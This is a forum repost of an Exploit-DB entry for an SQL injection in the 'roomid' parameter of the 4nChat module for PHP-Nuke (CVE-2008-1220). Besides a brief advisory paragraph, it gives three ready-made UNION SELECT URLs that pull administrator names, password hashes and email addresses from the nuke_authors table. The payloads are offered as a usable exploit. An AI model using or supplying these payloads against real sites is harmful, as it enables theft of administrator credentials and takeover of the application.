Exploit PHP-Nuke 4nChat Module 0.91 - 'roomid' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
31351
Проверка EDB
  1. Пройдено
Автор
MELOULISI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-1220
Дата публикации
2008-03-06
Код:
source: https://www.securityfocus.com/bid/28128/info

The 4nChat module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/modules.php?name=modload&name=4nChat&file=index&roomid=-2+union+select+1,aid,3,4,5+from+nuke_authors
http://www.example.com/modules.php?name=modload&name=4nChat&file=index&roomid=-2+union+select+1,pwd,3,4,5+from+nuke_authors
http://www.example.com/modules.php?name=modload&name=4nChat&file=index&roomid=-2+union+select+1,email,3,4,5+from+nuke_authors
 
Источник
www.exploit-db.com

Похожие темы